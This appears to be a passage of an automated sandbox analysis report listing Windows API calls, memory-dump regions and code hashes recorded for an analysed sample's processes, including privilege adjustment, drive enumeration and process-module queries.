                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 0037A94A
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 01DB0FB0
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 01DB0502
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 01DB0640
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 0037ABC9
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 01DB1148
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: Flags
                                                    • String ID:
                                                    • API String ID: 3401871038-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 0037AA71
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 0037A9C8
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 0037A9C8
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2122156471.00000000027F0000.00000040.00000001.sdmp, Offset: 027F0000, based on PE: false
                                                    Similarity
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2122239669.0000000002860000.00000040.00000040.sdmp, Offset: 02860000, based on PE: false
                                                    Similarity
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117656201.0000000000372000.00000040.00000001.sdmp, Offset: 00372000, based on PE: false
                                                    Similarity
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117656201.0000000000372000.00000040.00000001.sdmp, Offset: 00372000, based on PE: false
                                                    Similarity
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Executed Functions

                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01F1AD37
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01F1AD37
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01F1B329
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01F1B329
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 028801D0
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0288072D
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 02880DD6
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,71CB3989,00000000,00000000,00000000,00000000), ref: 01F1AFBE
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,71CB3989,00000000,00000000,00000000,00000000), ref: 01F1BDBC
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0288109E
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01F1A23E
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleCtrlHandler
                                                    • String ID:
                                                    • API String ID: 1513847179-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,71CB3989,00000000,00000000,00000000,00000000), ref: 01F1B0AE
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,71CB3989,00000000,00000000,00000000,00000000), ref: 02880819
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02880502
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0288072D
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,71CB3989,00000000,00000000,00000000,00000000), ref: 028808E5
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • VerLanguageNameW.KERNELBASE(?,00000E9C,?,?), ref: 01F1A94A
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageName
                                                    • String ID:
                                                    • API String ID: 2060303382-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 02880DD6
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,71CB3989,00000000,00000000,00000000,00000000), ref: 01F1BDBC
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 02880FB0
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,71CB3989,00000000,00000000,00000000,00000000), ref: 01F1B0AE
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleScreenBufferInfo.KERNEL32 ref: 01F1BB2F
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: BufferConsoleInfoScreen
                                                    • String ID:
                                                    • API String ID: 3437242342-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01F1AB1A
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 02881148
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,71CB3989,00000000,00000000,00000000,00000000), ref: 01F1AFBE
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,71CB3989,00000000,00000000,00000000,00000000), ref: 028808E5
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01F1BA7E
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0288132F
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetErrorMode.KERNELBASE(?), ref: 01F1A39C
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 02880640
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 0288099C
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01F1AB1A
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 01F1AA71
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,71CB3989,00000000,00000000,00000000,00000000), ref: 02880819
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 01F1ABC9
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01F1BA7E
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 028801D0
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0288109E
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01F1A23E
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleCtrlHandler
                                                    • String ID:
                                                    • API String ID: 1513847179-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0288132F
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleScreenBufferInfo.KERNEL32 ref: 01F1BB2F
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: BufferConsoleInfoScreen
                                                    • String ID:
                                                    • API String ID: 3437242342-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02880502
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 02880FB0
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • VerLanguageNameW.KERNELBASE(?,00000E9C,?,?), ref: 01F1A94A
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageName
                                                    • String ID:
                                                    • API String ID: 2060303382-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 02880640
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 01F1ABC9
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 02881148
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 0288099C
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetErrorMode.KERNELBASE(?), ref: 01F1A39C
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 01F1AA71
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 01F1A9C8
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 01F1A9C8
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2124251587.00000000029F0000.00000040.00000040.sdmp, Offset: 029F0000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2134898927.0000000005710000.00000040.00000001.sdmp, Offset: 05710000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3fdc81f1f62fd2070f11e48f257519ca2a4feefceccda7f3cab169f795b64d35
                                                    • Instruction ID: f44a2178dd3ff9197a80d49d4da0ea6627838377e1e9653d705a87e1fda9d4d9
                                                    • Opcode Fuzzy Hash: 3fdc81f1f62fd2070f11e48f257519ca2a4feefceccda7f3cab169f795b64d35
                                                    • Instruction Fuzzy Hash: CBF02E3120C3D25FC3068768DCA49957BB29E8712435942DBD455CF1D6CB24584BC3F6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2124251587.00000000029F0000.00000040.00000040.sdmp, Offset: 029F0000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4794fd04498b9f65f6502b3c4fa6872c0067dc59b773071ab808948a100141eb
                                                    • Instruction ID: 8e7e21542a6e4ec378185749e7c3ed7cc8a6b98d01145b24f444173703d6e147
                                                    • Opcode Fuzzy Hash: 4794fd04498b9f65f6502b3c4fa6872c0067dc59b773071ab808948a100141eb
                                                    • Instruction Fuzzy Hash: B1E09276A007008BD750CF0BEC41452F794EB84A30B18C17FDC4D8B700D239B504CAA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120159192.0000000001F12000.00000040.00000001.sdmp, Offset: 01F12000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 63424a90bdde8db31b10d1244b22e383e7d3b491a0b12a39fb3801a42e7d06a2
                                                    • Instruction ID: 15ee018bdf7540a60458f909b41613fafb23931dd3e05781057892077dca8a67
